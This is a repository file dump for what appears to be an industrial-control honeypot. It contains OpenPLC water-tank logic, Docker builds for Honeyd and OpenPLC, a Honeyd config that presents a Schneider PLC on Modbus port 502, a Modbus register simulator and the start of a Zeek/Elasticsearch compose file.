--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/Scene_3.dynlib
--------------------------------------------------------------------------------
/watertank/openplc-program/build/VARIABLES.csv:
--------------------------------------------------------------------------------
1 | // Programs
2 | 0;CONFIG0.RES0.INSTANCE0;MAIN;
3 |
4 | // Variables
5 | 0;FB;CONFIG0.RES0.INSTANCE0;CONFIG0.RES0.INSTANCE0;MAIN;
6 | 1;VAR;CONFIG0.RES0.INSTANCE0.I_PBFILL;CONFIG0.RES0.INSTANCE0.I_PBFILL;BOOL;
7 | 2;VAR;CONFIG0.RES0.INSTANCE0.I_PBDISCHARGE;CONFIG0.RES0.INSTANCE0.I_PBDISCHARGE;BOOL;
8 | 3;VAR;CONFIG0.RES0.INSTANCE0.Q_FILLVALVE;CONFIG0.RES0.INSTANCE0.Q_FILLVALVE;BOOL;
9 | 4;VAR;CONFIG0.RES0.INSTANCE0.Q_FILLLIGHT;CONFIG0.RES0.INSTANCE0.Q_FILLLIGHT;BOOL;
10 | 5;VAR;CONFIG0.RES0.INSTANCE0.Q_DISCHARGEVALVE;CONFIG0.RES0.INSTANCE0.Q_DISCHARGEVALVE;BOOL;
11 | 6;VAR;CONFIG0.RES0.INSTANCE0.Q_LIGHTDISCHARGE;CONFIG0.RES0.INSTANCE0.Q_LIGHTDISCHARGE;BOOL;
12 | 7;VAR;CONFIG0.RES0.INSTANCE0.Q_DISPLAY;CONFIG0.RES0.INSTANCE0.Q_DISPLAY;INT;
13 | 8;VAR;CONFIG0.RES0.INSTANCE0.FILLING;CONFIG0.RES0.INSTANCE0.FILLING;BOOL;
14 | 9;VAR;CONFIG0.RES0.INSTANCE0.DISCHARGING;CONFIG0.RES0.INSTANCE0.DISCHARGING;BOOL;
15 | 10;VAR;CONFIG0.RES0.INSTANCE0.TIMEFILLING;CONFIG0.RES0.INSTANCE0.TIMEFILLING;TIME;
16 | 11;VAR;CONFIG0.RES0.INSTANCE0.TIMEFILLINGINT;CONFIG0.RES0.INSTANCE0.TIMEFILLINGINT;INT;
17 | 12;VAR;CONFIG0.RES0.INSTANCE0.TIMEDISCHARGING;CONFIG0.RES0.INSTANCE0.TIMEDISCHARGING;TIME;
18 | 13;VAR;CONFIG0.RES0.INSTANCE0.TIMEDISCHARGINGINT;CONFIG0.RES0.INSTANCE0.TIMEDISCHARGINGINT;INT;
19 | 14;FB;CONFIG0.RES0.INSTANCE0.TON0;CONFIG0.RES0.INSTANCE0.TON0;TON;
20 | 15;VAR;CONFIG0.RES0.INSTANCE0.TON0.EN;CONFIG0.RES0.INSTANCE0.TON0.EN;BOOL;
21 | 16;VAR;CONFIG0.RES0.INSTANCE0.TON0.ENO;CONFIG0.RES0.INSTANCE0.TON0.ENO;BOOL;
22 | 17;VAR;CONFIG0.RES0.INSTANCE0.TON0.IN;CONFIG0.RES0.INSTANCE0.TON0.IN;BOOL;
23 | 18;VAR;CONFIG0.RES0.INSTANCE0.TON0.PT;CONFIG0.RES0.INSTANCE0.TON0.PT;TIME;
24 | 19;VAR;CONFIG0.RES0.INSTANCE0.TON0.Q;CONFIG0.RES0.INSTANCE0.TON0.Q;BOOL;
25 | 20;VAR;CONFIG0.RES0.INSTANCE0.TON0.ET;CONFIG0.RES0.INSTANCE0.TON0.ET;TIME;
26 | 21;VAR;CONFIG0.RES0.INSTANCE0.TON0.STATE;CONFIG0.RES0.INSTANCE0.TON0.STATE;SINT;
27 | 22;VAR;CONFIG0.RES0.INSTANCE0.TON0.PREV_IN;CONFIG0.RES0.INSTANCE0.TON0.PREV_IN;BOOL;
28 | 23;VAR;CONFIG0.RES0.INSTANCE0.TON0.CURRENT_TIME;CONFIG0.RES0.INSTANCE0.TON0.CURRENT_TIME;TIME;
29 | 24;VAR;CONFIG0.RES0.INSTANCE0.TON0.START_TIME;CONFIG0.RES0.INSTANCE0.TON0.START_TIME;TIME;
30 | 25;FB;CONFIG0.RES0.INSTANCE0.RS0;CONFIG0.RES0.INSTANCE0.RS0;RS;
31 | 26;VAR;CONFIG0.RES0.INSTANCE0.RS0.EN;CONFIG0.RES0.INSTANCE0.RS0.EN;BOOL;
32 | 27;VAR;CONFIG0.RES0.INSTANCE0.RS0.ENO;CONFIG0.RES0.INSTANCE0.RS0.ENO;BOOL;
33 | 28;VAR;CONFIG0.RES0.INSTANCE0.RS0.S;CONFIG0.RES0.INSTANCE0.RS0.S;BOOL;
34 | 29;VAR;CONFIG0.RES0.INSTANCE0.RS0.R1;CONFIG0.RES0.INSTANCE0.RS0.R1;BOOL;
35 | 30;VAR;CONFIG0.RES0.INSTANCE0.RS0.Q1;CONFIG0.RES0.INSTANCE0.RS0.Q1;BOOL;
36 | 31;FB;CONFIG0.RES0.INSTANCE0.R_TRIG0;CONFIG0.RES0.INSTANCE0.R_TRIG0;R_TRIG;
37 | 32;VAR;CONFIG0.RES0.INSTANCE0.R_TRIG0.EN;CONFIG0.RES0.INSTANCE0.R_TRIG0.EN;BOOL;
38 | 33;VAR;CONFIG0.RES0.INSTANCE0.R_TRIG0.ENO;CONFIG0.RES0.INSTANCE0.R_TRIG0.ENO;BOOL;
39 | 34;VAR;CONFIG0.RES0.INSTANCE0.R_TRIG0.CLK;CONFIG0.RES0.INSTANCE0.R_TRIG0.CLK;BOOL;
40 | 35;VAR;CONFIG0.RES0.INSTANCE0.R_TRIG0.Q;CONFIG0.RES0.INSTANCE0.R_TRIG0.Q;BOOL;
41 | 36;VAR;CONFIG0.RES0.INSTANCE0.R_TRIG0.M;CONFIG0.RES0.INSTANCE0.R_TRIG0.M;BOOL;
42 | 37;FB;CONFIG0.RES0.INSTANCE0.TON1;CONFIG0.RES0.INSTANCE0.TON1;TON;
43 | 38;VAR;CONFIG0.RES0.INSTANCE0.TON1.EN;CONFIG0.RES0.INSTANCE0.TON1.EN;BOOL;
44 | 39;VAR;CONFIG0.RES0.INSTANCE0.TON1.ENO;CONFIG0.RES0.INSTANCE0.TON1.ENO;BOOL;
45 | 40;VAR;CONFIG0.RES0.INSTANCE0.TON1.IN;CONFIG0.RES0.INSTANCE0.TON1.IN;BOOL;
46 | 41;VAR;CONFIG0.RES0.INSTANCE0.TON1.PT;CONFIG0.RES0.INSTANCE0.TON1.PT;TIME;
47 | 42;VAR;CONFIG0.RES0.INSTANCE0.TON1.Q;CONFIG0.RES0.INSTANCE0.TON1.Q;BOOL;
48 | 43;VAR;CONFIG0.RES0.INSTANCE0.TON1.ET;CONFIG0.RES0.INSTANCE0.TON1.ET;TIME;
49 | 44;VAR;CONFIG0.RES0.INSTANCE0.TON1.STATE;CONFIG0.RES0.INSTANCE0.TON1.STATE;SINT;
50 | 45;VAR;CONFIG0.RES0.INSTANCE0.TON1.PREV_IN;CONFIG0.RES0.INSTANCE0.TON1.PREV_IN;BOOL;
51 | 46;VAR;CONFIG0.RES0.INSTANCE0.TON1.CURRENT_TIME;CONFIG0.RES0.INSTANCE0.TON1.CURRENT_TIME;TIME;
52 | 47;VAR;CONFIG0.RES0.INSTANCE0.TON1.START_TIME;CONFIG0.RES0.INSTANCE0.TON1.START_TIME;TIME;
53 | 48;FB;CONFIG0.RES0.INSTANCE0.RS1;CONFIG0.RES0.INSTANCE0.RS1;RS;
54 | 49;VAR;CONFIG0.RES0.INSTANCE0.RS1.EN;CONFIG0.RES0.INSTANCE0.RS1.EN;BOOL;
55 | 50;VAR;CONFIG0.RES0.INSTANCE0.RS1.ENO;CONFIG0.RES0.INSTANCE0.RS1.ENO;BOOL;
56 | 51;VAR;CONFIG0.RES0.INSTANCE0.RS1.S;CONFIG0.RES0.INSTANCE0.RS1.S;BOOL;
57 | 52;VAR;CONFIG0.RES0.INSTANCE0.RS1.R1;CONFIG0.RES0.INSTANCE0.RS1.R1;BOOL;
58 | 53;VAR;CONFIG0.RES0.INSTANCE0.RS1.Q1;CONFIG0.RES0.INSTANCE0.RS1.Q1;BOOL;
59 | 54;FB;CONFIG0.RES0.INSTANCE0.F_TRIG0;CONFIG0.RES0.INSTANCE0.F_TRIG0;F_TRIG;
60 | 55;VAR;CONFIG0.RES0.INSTANCE0.F_TRIG0.EN;CONFIG0.RES0.INSTANCE0.F_TRIG0.EN;BOOL;
61 | 56;VAR;CONFIG0.RES0.INSTANCE0.F_TRIG0.ENO;CONFIG0.RES0.INSTANCE0.F_TRIG0.ENO;BOOL;
62 | 57;VAR;CONFIG0.RES0.INSTANCE0.F_TRIG0.CLK;CONFIG0.RES0.INSTANCE0.F_TRIG0.CLK;BOOL;
63 | 58;VAR;CONFIG0.RES0.INSTANCE0.F_TRIG0.Q;CONFIG0.RES0.INSTANCE0.F_TRIG0.Q;BOOL;
64 | 59;VAR;CONFIG0.RES0.INSTANCE0.F_TRIG0.M;CONFIG0.RES0.INSTANCE0.F_TRIG0.M;BOOL;
65 | 60;VAR;CONFIG0.RES0.INSTANCE0.PLACEHOLDER;CONFIG0.RES0.INSTANCE0.PLACEHOLDER;INT;
66 | 61;VAR;CONFIG0.RES0.INSTANCE0.SIMULATION;CONFIG0.RES0.INSTANCE0.SIMULATION;INT;
67 | 62;VAR;CONFIG0.RES0.INSTANCE0._TMP_NOT11_OUT;CONFIG0.RES0.INSTANCE0._TMP_NOT11_OUT;BOOL;
68 | 63;VAR;CONFIG0.RES0.INSTANCE0._TMP_AND12_OUT;CONFIG0.RES0.INSTANCE0._TMP_AND12_OUT;BOOL;
69 | 64;VAR;CONFIG0.RES0.INSTANCE0._TMP_NOT21_OUT;CONFIG0.RES0.INSTANCE0._TMP_NOT21_OUT;BOOL;
70 | 65;VAR;CONFIG0.RES0.INSTANCE0._TMP_AND22_OUT;CONFIG0.RES0.INSTANCE0._TMP_AND22_OUT;BOOL;
71 | 66;VAR;CONFIG0.RES0.INSTANCE0._TMP_TIME_TO_INT27_OUT;CONFIG0.RES0.INSTANCE0._TMP_TIME_TO_INT27_OUT;INT;
72 | 67;VAR;CONFIG0.RES0.INSTANCE0._TMP_TIME_TO_INT28_OUT;CONFIG0.RES0.INSTANCE0._TMP_TIME_TO_INT28_OUT;INT;
73 | 68;VAR;CONFIG0.RES0.INSTANCE0._TMP_ADD57_OUT;CONFIG0.RES0.INSTANCE0._TMP_ADD57_OUT;INT;
74 |
75 |
76 | // Ticktime
77 | 20000000
78 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/beremiz.h:
--------------------------------------------------------------------------------
1 | #ifndef _BEREMIZ_H_
2 | #define _BEREMIZ_H_
3 |
4 | /* Beremiz' header file for use by extensions */
5 |
6 | #include "iec_types.h"
7 |
8 | #define LOG_LEVELS 4
9 | #define LOG_CRITICAL 0
10 | #define LOG_WARNING 1
11 | #define LOG_INFO 2
12 | #define LOG_DEBUG 3
13 |
14 | extern unsigned long long common_ticktime__;
15 |
16 | #ifdef TARGET_LOGGING_DISABLE
17 | static inline int LogMessage(uint8_t level, char* buf, uint32_t size)
18 | {
19 | (void)level;
20 | (void)buf;
21 | (void)size;
22 | return 0;
23 | }
24 | #else
25 | int LogMessage(uint8_t level, char* buf, uint32_t size);
26 | #endif
27 |
28 | long AtomicCompareExchange(long* atomicvar,long compared, long exchange);
29 | void *create_RT_to_nRT_signal(char* name);
30 | void delete_RT_to_nRT_signal(void* handle);
31 | int wait_RT_to_nRT_signal(void* handle);
32 | int unblock_RT_to_nRT_signal(void* handle);
33 | void nRT_reschedule(void);
34 |
35 | #endif
36 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/generated_plc.st:
--------------------------------------------------------------------------------
1 | PROGRAM Main
2 | VAR
3 | I_PbFill AT %IX100.0 : BOOL;
4 | I_PbDischarge AT %IX100.1 : BOOL := True;
5 | Q_FillValve AT %QX100.0 : BOOL;
6 | Q_FillLight AT %QX100.1 : BOOL;
7 | Q_DischargeValve AT %QX100.2 : BOOL;
8 | Q_LightDischarge AT %QX100.3 : BOOL;
9 | Q_Display AT %QW100 : INT;
10 | END_VAR
11 | VAR
12 | Filling : BOOL;
13 | Discharging : BOOL;
14 | TimeFilling : TIME;
15 | TimeFillingInt : INT;
16 | TimeDischarging : TIME;
17 | TimeDischargingInt : INT;
18 | TON0 : TON;
19 | RS0 : RS;
20 | R_TRIG0 : R_TRIG;
21 | TON1 : TON;
22 | RS1 : RS;
23 | F_TRIG0 : F_TRIG;
24 | Placeholder : INT;
25 | END_VAR
26 | VAR
27 | Simulation AT %QW101 : INT;
28 | END_VAR
29 | VAR
30 | _TMP_NOT11_OUT : BOOL;
31 | _TMP_AND12_OUT : BOOL;
32 | _TMP_NOT21_OUT : BOOL;
33 | _TMP_AND22_OUT : BOOL;
34 | _TMP_TIME_TO_INT27_OUT : INT;
35 | _TMP_TIME_TO_INT28_OUT : INT;
36 | _TMP_ADD57_OUT : INT;
37 | END_VAR
38 |
39 | R_TRIG0(CLK := I_PbFill);
40 | _TMP_NOT11_OUT := NOT(Discharging);
41 | _TMP_AND12_OUT := AND(R_TRIG0.Q, _TMP_NOT11_OUT);
42 | TON0(IN := Filling, PT := T#8s);
43 | RS0(S := _TMP_AND12_OUT, R1 := TON0.Q);
44 | Filling := RS0.Q1;
45 | TimeFilling := TON0.ET;
46 | F_TRIG0(CLK := I_PbDischarge);
47 | _TMP_NOT21_OUT := NOT(Filling);
48 | _TMP_AND22_OUT := AND(F_TRIG0.Q, _TMP_NOT21_OUT);
49 | TON1(IN := Discharging, PT := T#8s);
50 | RS1(S := _TMP_AND22_OUT, R1 := TON1.Q);
51 | Discharging := RS1.Q1;
52 | TimeDischarging := TON1.ET;
53 | _TMP_TIME_TO_INT27_OUT := TIME_TO_INT(TimeFilling);
54 | TimeFillingInt := _TMP_TIME_TO_INT27_OUT;
55 | _TMP_TIME_TO_INT28_OUT := TIME_TO_INT(TimeDischarging);
56 | TimeDischargingInt := _TMP_TIME_TO_INT28_OUT;
57 | Q_FillLight := Filling;
58 | Q_FillValve := Filling;
59 | Q_LightDischarge := Discharging;
60 | Q_DischargeValve := Discharging;
61 | _TMP_ADD57_OUT := ADD(TimeFillingInt, TimeDischargingInt);
62 | Q_Display := _TMP_ADD57_OUT;
63 | END_PROGRAM
64 |
65 |
66 | CONFIGURATION Config0
67 |
68 | RESOURCE Res0 ON PLC
69 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0);
70 | PROGRAM instance0 WITH task0 : Main;
71 | END_RESOURCE
72 | END_CONFIGURATION
73 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/lastbuildPLC.md5:
--------------------------------------------------------------------------------
1 | 9d5bc8d40946e8ca2f232284604ad72c
--------------------------------------------------------------------------------
/watertank/openplc-program/build/plc.st:
--------------------------------------------------------------------------------
1 | TYPE
2 | LOGLEVEL : (CRITICAL, WARNING, INFO, DEBUG) := INFO;
3 | END_TYPE
4 |
5 | FUNCTION_BLOCK LOGGER
6 | VAR_INPUT
7 | TRIG : BOOL;
8 | MSG : STRING;
9 | LEVEL : LOGLEVEL := INFO;
10 | END_VAR
11 | VAR
12 | TRIG0 : BOOL;
13 | END_VAR
14 |
15 | IF TRIG AND NOT TRIG0 THEN
16 | {{
17 | LogMessage(GetFbVar(LEVEL),(char*)GetFbVar(MSG, .body),GetFbVar(MSG, .len));
18 | }}
19 | END_IF;
20 | TRIG0:=TRIG;
21 | END_FUNCTION_BLOCK
22 |
23 |
24 | PROGRAM Main
25 | VAR
26 | I_PbFill : BOOL;
27 | I_PbDischarge : BOOL := True;
28 | Q_FillValve : BOOL;
29 | Q_FillLight : BOOL;
30 | Q_DischargeValve : BOOL;
31 | Q_LightDischarge : BOOL;
32 | Q_Display : INT;
33 | END_VAR
34 | VAR
35 | Filling : BOOL;
36 | Discharging : BOOL;
37 | TimeFilling : TIME;
38 | TimeFillingInt : INT;
39 | TimeDischarging : TIME;
40 | TimeDischargingInt : INT;
41 | TON0 : TON;
42 | RS0 : RS;
43 | R_TRIG0 : R_TRIG;
44 | TON1 : TON;
45 | RS1 : RS;
46 | F_TRIG0 : F_TRIG;
47 | Placeholder : INT;
48 | END_VAR
49 | VAR
50 | Simulation : INT;
51 | END_VAR
52 | VAR
53 | _TMP_NOT11_OUT : BOOL;
54 | _TMP_AND12_OUT : BOOL;
55 | _TMP_NOT21_OUT : BOOL;
56 | _TMP_AND22_OUT : BOOL;
57 | _TMP_TIME_TO_INT27_OUT : INT;
58 | _TMP_TIME_TO_INT28_OUT : INT;
59 | _TMP_ADD57_OUT : INT;
60 | END_VAR
61 |
62 | R_TRIG0(CLK := I_PbFill);
63 | _TMP_NOT11_OUT := NOT(Discharging);
64 | _TMP_AND12_OUT := AND(R_TRIG0.Q, _TMP_NOT11_OUT);
65 | TON0(IN := Filling, PT := T#8s);
66 | RS0(S := _TMP_AND12_OUT, R1 := TON0.Q);
67 | Filling := RS0.Q1;
68 | TimeFilling := TON0.ET;
69 | F_TRIG0(CLK := I_PbDischarge);
70 | _TMP_NOT21_OUT := NOT(Filling);
71 | _TMP_AND22_OUT := AND(F_TRIG0.Q, _TMP_NOT21_OUT);
72 | TON1(IN := Discharging, PT := T#8s);
73 | RS1(S := _TMP_AND22_OUT, R1 := TON1.Q);
74 | Discharging := RS1.Q1;
75 | TimeDischarging := TON1.ET;
76 | _TMP_TIME_TO_INT27_OUT := TIME_TO_INT(TimeFilling);
77 | TimeFillingInt := _TMP_TIME_TO_INT27_OUT;
78 | _TMP_TIME_TO_INT28_OUT := TIME_TO_INT(TimeDischarging);
79 | TimeDischargingInt := _TMP_TIME_TO_INT28_OUT;
80 | Q_FillLight := Filling;
81 | Q_FillValve := Filling;
82 | Q_LightDischarge := Discharging;
83 | Q_DischargeValve := Discharging;
84 | _TMP_ADD57_OUT := ADD(TimeFillingInt, TimeDischargingInt);
85 | Q_Display := _TMP_ADD57_OUT;
86 | END_PROGRAM
87 |
88 |
89 | CONFIGURATION Config0
90 |
91 | RESOURCE Res0 ON PLC
92 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0);
93 | PROGRAM instance0 WITH task0 : Main;
94 | END_RESOURCE
95 | END_CONFIGURATION
96 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/plc_debugger.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/plc_debugger.o
--------------------------------------------------------------------------------
/watertank/openplc-program/build/plc_main.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/plc_main.o
--------------------------------------------------------------------------------
/watertank/openplc-program/watertank.st:
--------------------------------------------------------------------------------
1 | PROGRAM Main
2 | VAR
3 | I_PbFill AT %IX100.0 : BOOL;
4 | I_PbDischarge AT %IX100.1 : BOOL := True;
5 | Q_FillValve AT %QX100.0 : BOOL;
6 | Q_FillLight AT %QX100.1 : BOOL;
7 | Q_DischargeValve AT %QX100.2 : BOOL;
8 | Q_LightDischarge AT %QX100.3 : BOOL;
9 | Q_Display AT %QW100 : INT;
10 | END_VAR
11 | VAR
12 | Filling : BOOL;
13 | Discharging : BOOL;
14 | TimeFilling : TIME;
15 | TimeFillingInt : INT;
16 | TimeDischarging : TIME;
17 | TimeDischargingInt : INT;
18 | TON0 : TON;
19 | RS0 : RS;
20 | R_TRIG0 : R_TRIG;
21 | TON1 : TON;
22 | RS1 : RS;
23 | F_TRIG0 : F_TRIG;
24 | Placeholder : INT;
25 | END_VAR
26 | VAR
27 | Simulation AT %QW101 : INT;
28 | END_VAR
29 | VAR
30 | _TMP_NOT11_OUT : BOOL;
31 | _TMP_AND12_OUT : BOOL;
32 | _TMP_NOT21_OUT : BOOL;
33 | _TMP_AND22_OUT : BOOL;
34 | _TMP_TIME_TO_INT27_OUT : INT;
35 | _TMP_TIME_TO_INT28_OUT : INT;
36 | _TMP_ADD57_OUT : INT;
37 | END_VAR
38 |
39 | R_TRIG0(CLK := I_PbFill);
40 | _TMP_NOT11_OUT := NOT(Discharging);
41 | _TMP_AND12_OUT := AND(R_TRIG0.Q, _TMP_NOT11_OUT);
42 | TON0(IN := Filling, PT := T#8s);
43 | RS0(S := _TMP_AND12_OUT, R1 := TON0.Q);
44 | Filling := RS0.Q1;
45 | TimeFilling := TON0.ET;
46 | F_TRIG0(CLK := I_PbDischarge);
47 | _TMP_NOT21_OUT := NOT(Filling);
48 | _TMP_AND22_OUT := AND(F_TRIG0.Q, _TMP_NOT21_OUT);
49 | TON1(IN := Discharging, PT := T#8s);
50 | RS1(S := _TMP_AND22_OUT, R1 := TON1.Q);
51 | Discharging := RS1.Q1;
52 | TimeDischarging := TON1.ET;
53 | _TMP_TIME_TO_INT27_OUT := TIME_TO_INT(TimeFilling);
54 | TimeFillingInt := _TMP_TIME_TO_INT27_OUT;
55 | _TMP_TIME_TO_INT28_OUT := TIME_TO_INT(TimeDischarging);
56 | TimeDischargingInt := _TMP_TIME_TO_INT28_OUT;
57 | Q_FillLight := Filling;
58 | Q_FillValve := Filling;
59 | Q_LightDischarge := Discharging;
60 | Q_DischargeValve := Discharging;
61 | _TMP_ADD57_OUT := ADD(TimeFillingInt, TimeDischargingInt);
62 | Q_Display := _TMP_ADD57_OUT;
63 | END_PROGRAM
64 |
65 |
66 | CONFIGURATION Config0
67 |
68 | RESOURCE Res0 ON PLC
69 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0);
70 | PROGRAM instance0 WITH task0 : Main;
71 | END_RESOURCE
72 | END_CONFIGURATION
73 |
--------------------------------------------------------------------------------
/watertank/openplc/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:xenial
2 |
3 | USER root
4 | WORKDIR /root/
5 |
6 | RUN apt-get update
7 | RUN apt-get install -y build-essential \
8 | libpcap-dev \
9 | libdnet-dev \
10 | libevent-dev \
11 | libpcre3-dev \
12 | make \
13 | bzip2 \
14 | nmap \
15 | psmisc \
16 | libtool \
17 | libdumbnet-dev \
18 | zlib1g-dev \
19 | rrdtool \
20 | net-tools \
21 | git-core \
22 | libreadline-dev \
23 | libedit-dev \
24 | bison \
25 | flex \
26 | farpd \
27 | lftp \
28 | iputils-ping \
29 | sudo \
30 | automake \
31 | sqlite3
32 |
33 |
34 | WORKDIR /home/
35 | RUN git clone https://github.com/DataSoft/Honeyd.git
36 | RUN cd Honeyd \
37 | && ./autogen.sh \
38 | && ./configure \
39 | && make \
40 | && make install
41 |
42 |
43 |
44 |
45 |
46 | WORKDIR /home/
47 | ADD honeyd.conf .
48 | # RUN git clone https://github.com/thiagoralves/OpenPLC_v3.git
49 | # WORKDIR /home/OpenPLC_v3/
50 | # RUN ls -al install.sh
51 | # RUN sudo chmod +x install.sh
52 | # RUN sudo ./install.sh linux
53 |
54 | RUN sudo apt-get install -y build-essential pkg-config bison flex autoconf automake libtool make nodejs git
55 | RUN git clone https://github.com/thiagoralves/OpenPLC_v2
56 | WORKDIR /home/OpenPLC_v2/
57 | RUN sudo chmod +x ./build.sh
58 | RUN printf "n\n1\n" | ./build.sh
59 |
60 |
61 | EXPOSE 502
62 | EXPOSE 8080
63 |
64 |
65 | # CMD nohup honeyd -d -f /home/honeyd.conf &> honeyd.log; sudo nodejs /OpenPLC_v2/server.js
66 | CMD sudo nodejs server.js ;nohup honeyd -d -f /app/honeyd.conf &> honeyd.log
--------------------------------------------------------------------------------
/watertank/openplc/PLC1.st:
--------------------------------------------------------------------------------
1 | PROGRAM PLC1
2 | VAR
3 | level AT %IW0 : INT;
4 | Richiesta AT %QX0.2 : BOOL;
5 | request AT %IW1 : INT;
6 | pumps AT %QX0.0 : BOOL;
7 | valve AT %QX0.1 : BOOL;
8 | low AT %MX0.0 : BOOL;
9 | high AT %MX0.1 : BOOL;
10 | open_req AT %MX0.3 : BOOL;
11 | close_req AT %MX0.4 : BOOL;
12 | low_1 AT %MW0 : INT := 40;
13 | high_1 AT %MW1 : INT := 80;
14 | END_VAR
15 | VAR
16 | LE3_OUT : BOOL;
17 | GE7_OUT : BOOL;
18 | END_VAR
19 |
20 | LE3_OUT := LE(level, low_1);
21 | low := LE3_OUT;
22 | GE7_OUT := GE(level, high_1);
23 | high := GE7_OUT;
24 | open_req := Richiesta;
25 | close_req := NOT(Richiesta);
26 | pumps := NOT(high) AND (low OR pumps);
27 | valve := NOT(close_req) AND (open_req AND NOT(low) OR valve);
28 | END_PROGRAM
29 |
30 |
31 | CONFIGURATION Config0
32 |
33 | RESOURCE Res0 ON PLC
34 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0);
35 | PROGRAM instance0 WITH task0 : PLC1;
36 | END_RESOURCE
37 | END_CONFIGURATION
38 |
--------------------------------------------------------------------------------
/watertank/openplc/Watertank.st:
--------------------------------------------------------------------------------
1 | PROGRAM Main
2 | VAR
3 | I_PbFill AT %IX100.0 : BOOL;
4 | I_PbDischarge AT %IX100.1 : BOOL := True;
5 | Q_FillValve AT %QX100.0 : BOOL;
6 | Q_FillLight AT %QX100.1 : BOOL;
7 | Q_DischargeValve AT %QX100.2 : BOOL;
8 | Q_LightDischarge AT %QX100.3 : BOOL;
9 | Q_Display AT %QW100 : INT;
10 | END_VAR
11 | VAR
12 | Filling : BOOL;
13 | Discharging : BOOL;
14 | TimeFilling : TIME;
15 | TimeFillingInt : INT;
16 | TimeDischarging : TIME;
17 | TimeDischargingInt : INT;
18 | TON0 : TON;
19 | RS0 : RS;
20 | R_TRIG0 : R_TRIG;
21 | TON1 : TON;
22 | RS1 : RS;
23 | F_TRIG0 : F_TRIG;
24 | Placeholder : INT;
25 | END_VAR
26 | VAR
27 | Simulation AT %QW101 : INT;
28 | END_VAR
29 | VAR
30 | _TMP_NOT11_OUT : BOOL;
31 | _TMP_AND12_OUT : BOOL;
32 | _TMP_NOT21_OUT : BOOL;
33 | _TMP_AND22_OUT : BOOL;
34 | _TMP_TIME_TO_INT27_OUT : INT;
35 | _TMP_TIME_TO_INT28_OUT : INT;
36 | _TMP_ADD57_OUT : INT;
37 | END_VAR
38 |
39 | R_TRIG0(CLK := I_PbFill);
40 | _TMP_NOT11_OUT := NOT(Discharging);
41 | _TMP_AND12_OUT := AND(R_TRIG0.Q, _TMP_NOT11_OUT);
42 | TON0(IN := Filling, PT := T#8s);
43 | RS0(S := _TMP_AND12_OUT, R1 := TON0.Q);
44 | Filling := RS0.Q1;
45 | TimeFilling := TON0.ET;
46 | F_TRIG0(CLK := I_PbDischarge);
47 | _TMP_NOT21_OUT := NOT(Filling);
48 | _TMP_AND22_OUT := AND(F_TRIG0.Q, _TMP_NOT21_OUT);
49 | TON1(IN := Discharging, PT := T#8s);
50 | RS1(S := _TMP_AND22_OUT, R1 := TON1.Q);
51 | Discharging := RS1.Q1;
52 | TimeDischarging := TON1.ET;
53 | _TMP_TIME_TO_INT27_OUT := TIME_TO_INT(TimeFilling);
54 | TimeFillingInt := _TMP_TIME_TO_INT27_OUT;
55 | _TMP_TIME_TO_INT28_OUT := TIME_TO_INT(TimeDischarging);
56 | TimeDischargingInt := _TMP_TIME_TO_INT28_OUT;
57 | Q_FillLight := Filling;
58 | Q_FillValve := Filling;
59 | Q_LightDischarge := Discharging;
60 | Q_DischargeValve := Discharging;
61 | _TMP_ADD57_OUT := ADD(TimeFillingInt, TimeDischargingInt);
62 | Q_Display := _TMP_ADD57_OUT;
63 | END_PROGRAM
64 |
65 |
66 | CONFIGURATION Config0
67 |
68 | RESOURCE Res0 ON PLC
69 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0);
70 | PROGRAM instance0 WITH task0 : Main;
71 | END_RESOURCE
72 | END_CONFIGURATION
73 |
--------------------------------------------------------------------------------
/watertank/openplc/honeyd.conf:
--------------------------------------------------------------------------------
1 | create schneider_m221
2 | set schneider_m221 personality "Schneider Electric TSX ETY programmable logic controller"
3 | set schneider_m221 default tcp action reset
4 | set schneider_m221 default icmp action open
5 | add schneider_m221 tcp port 502 proxy 0.0.0.0:502
6 | set schneider_m221 ethernet "28:29:86:F9:7C:6E"
7 |
--------------------------------------------------------------------------------
/watertank/openplc_sim/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.9-slim-buster
2 | ENV PYTHONUNBUFFERED=1
3 | COPY . /app
4 | WORKDIR /app
5 |
6 | RUN pip3 install -r requirements.txt
7 |
8 | CMD [ "python3", "tcp_modbus.py"]
9 |
--------------------------------------------------------------------------------
/watertank/openplc_sim/requirements.txt:
--------------------------------------------------------------------------------
1 | pymodbus==2.5.3
2 | pyserial==3.5
--------------------------------------------------------------------------------
/watertank/openplc_sim/tcp_modbus.py:
--------------------------------------------------------------------------------
1 | from pymodbus.client.sync import ModbusTcpClient
2 | from datetime import datetime, time
3 | import random
4 | import time
5 |
6 |
7 | host = '192.168.0.26' #ip of your modbus
8 | port = 502
9 | client = ModbusTcpClient(host, port)
10 | while True:
11 | client.connect()
12 | data = random.randint(25,35)
13 |
14 | # To Write values to multiple registers
15 | list = []
16 | for i in range(2):
17 | data = random.randint(10,40)
18 | list.append(data)
19 |
20 | # read_values = client.read_holding_registers(3, 0, count=2)
21 | # print(f"Read values: {read_values}")
22 |
23 | wr = client.write_registers(101,list,unit=1)
24 | # write to multiple registers using list of data
25 | # wr = client.write_registers(20,list,unit=1)
26 | time.sleep(0.1)
27 |
--------------------------------------------------------------------------------
/zeek/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3.9"
2 | services:
3 | elasticsearch:
4 | build:
5 | context: ./elasticsearch
6 | dockerfile: Dockerfile
7 | stdin_open: true # docker run -i
8 | tty: true
9 | privileged: true
10 | environment:
11 | # - bootstrap.memory_lock=true
12 | - discovery.type=single-node
13 | # - ELASTICSEARCH_USERNAME=elastic
14 | # - ELASTIC_PASSWORD=Virtue@123
